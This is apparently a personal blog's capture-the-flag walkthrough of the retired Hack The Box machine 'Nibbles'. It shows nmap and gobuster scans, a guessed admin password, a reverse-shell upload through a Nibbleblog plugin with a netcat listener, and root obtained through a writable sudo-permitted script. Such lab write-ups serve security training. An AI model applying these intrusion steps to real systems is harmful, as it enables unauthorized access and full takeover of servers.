Chris Ruggieri (Neocount Phoenix)

Security Blog, Rants, Raves, Write-ups, and Code

Nibbles

Name: Nibbles
Release Date: 13 Jan 2018
Retire Date: 30 Jun 2018
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
m0noc 00 days, 02 hours, 20 mins, 53 seconds
m0noc 00 days, 02 hours, 24 mins, 34 seconds
Creator: mrb3n
CherryTree File: CherryTree - Remove the .txt extension

Again, we start with nmap -sC -sV -oA ./nibbles 10.10.10.75

 
$ nmap -sC -sV -Pn -oA ./nibbles 10.10.10.75
  
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-09 09:11 EDT
  Nmap scan report for 10.10.10.75
  Host is up (0.080s latency).
  Not shown: 998 closed ports
  PORT   STATE SERVICE VERSION
  22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
  | ssh-hostkey: 
  |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
  |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
  |_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
  80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  |_http-server-header: Apache/2.4.18 (Ubuntu)
  |_http-title: Site doesn't have a title (text/html).
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 23.51 seconds

Let's start with the HTTP side of life.  The starting page is just a "Hello World" plaintext, but the source code shows us that there is something at /nibbleblog.

Nibble blog is exactly that.  A blog, in this case with no posts.  Let's gobuster it and see what's there.

 
gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.75/nibbleblog
  
  ===============================================================
  Gobuster v3.0.1
  by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
  ===============================================================
  [+] Url:            http://10.10.10.75/nibbleblog
  [+] Threads:        10
  [+] Wordlist:       /usr/share/dirb/wordlists/big.txt
  [+] Status codes:   200,204,301,302,307,401,403
  [+] User Agent:     gobuster/3.0.1
  [+] Timeout:        10s
  ===============================================================
  2020/04/09 09:44:54 Starting gobuster
  ===============================================================
  /.htaccess (Status: 403)
  /.htpasswd (Status: 403)
  /README (Status: 200)
  /admin (Status: 301)
  /content (Status: 301)
  /languages (Status: 301)
  /plugins (Status: 301)
  /themes (Status: 301)
  ===============================================================
  2020/04/09 09:47:04 Finished
  ===============================================================

We found a few directories to look through.  If we gobuster the /content folder we also find a /content/private.  Inside of that folder we find a users.xml.  Now we have a username of admin!  We also see that a login blacklist is in effect.  So, we can't just hammer away at the login page (/nibbleblog/admin.php).  To be honest, getting in was a guess.  We are dealing with a Nibble Blog and the title is Nibbles.  So, try admin:nibbles.

From the README file, we can find the Version of Nibbleblog that is running (v4.0.3).  A quick searchsploit finds an arbitrary file upload.

 
searchsploit nibbleblog 
  --------------------------------------------------------------------------------------------------------------
   Exploit Title                                                       |  Path
                                                                       | (/usr/share/exploitdb/)
  --------------------------------------------------------------------- ----------------------------------------
  Nibbleblog 3 - Multiple SQL Injections                               | exploits/php/webapps/35865.txt
  Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                | exploits/php/remote/38489.rb
  --------------------------------------------------------------------- ----------------------------------------
  Shellcodes: No Result

Again, I dislike metasploit (it makes us lazy.  Plus, you can't use it on OSCP), so let's see if there's another way to get the same results. We find that "other way" here. When we navigate to the Plugins page, we find that the "My image" plugin is already installed.  We just need to configure it.

So, we'll use pentest monkey's php-reverse-shell.

Now, we start a netcat listener (nc -lvnp 1234) and navigate to http://10.10.10.75/nibbleblog/content/private/plugins/my_image/ We don't see a shell.php, but we do see an image.php.  When we hit that one, we get a shell as nibbler.

Next, mainly as good practice, we migrate LinEnum.sh over to the target box and run it with the -t flag.  As always, the results are in the attached CTB file above.  LinEnum usage is good practice for discovering possible privesc avenues.  Like in this situation we find something interesting in the SUDO section (lines 138 - 143).

 
###[00;33m[+] We can sudo without supplying a password!###[00m
  Matching Defaults entries for nibbler on Nibbles:
      env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

  User nibbler may run the following commands on Nibbles:
      (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

We can run monitor.sh as root with no password.  Except, checking /home/nibbler shows that personal doesn't exist.  Let alone/personal/stuff.  Make them.  mkdir personal and mkdir personal/stuff.  Then it's just a matter of creating our own monitor.sh and running it with sudo.  Bash does exist on the system, so a simple "bash -i" should work.  After running it sith sudo, we're finished.


Grab your flags!